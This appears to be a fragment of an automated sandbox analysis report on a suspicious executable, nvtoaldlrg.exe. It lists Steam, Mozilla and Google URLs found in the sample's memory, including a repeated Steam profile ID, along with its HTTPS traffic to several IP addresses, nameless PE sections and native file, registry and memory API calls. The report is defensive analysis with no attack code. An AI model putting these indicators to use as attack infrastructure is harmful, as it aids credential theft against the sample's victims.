          Source: nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/7656119982
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
          Source: nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128.36_
          Source: nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
          Source: nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128D
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128L
          Source: nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128O
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128e
          Source: nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128eM
          Source: nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128euM
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994573747.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128mB
          Source: nvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/uM
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
          Source: nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
          Source: nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000147F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
          Source: nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: nvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: nvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: nvtoaldlrg.exe, 00000000.00000003.890563674.00000000047CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: nvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
          Source: nvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
          Source: nvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: nvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994617580.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
          Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49738 version: TLS 1.2

          System Summary

          barindex
          PE file has nameless sections
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B786B8 NtReadFile,0_2_00B786B8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78634 NtClose,0_2_00B78634
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78650 NtSetInformationFile,0_2_00B78650
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B787F0 NtProtectVirtualMemory,0_2_00B787F0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78710 NtCreateFile,0_2_00B78710
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78BD0 NtClose,VirtualFree,0_2_00B78BD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B780B0 NtSetValueKey,0_2_00B780B0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78028 NtCreateKey,0_2_00B78028
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78070 NtEnumerateKey,0_2_00B78070
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78180 NtNotifyChangeKey,0_2_00B78180
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B781E0 NtQueryMultipleValueKey,0_2_00B781E0
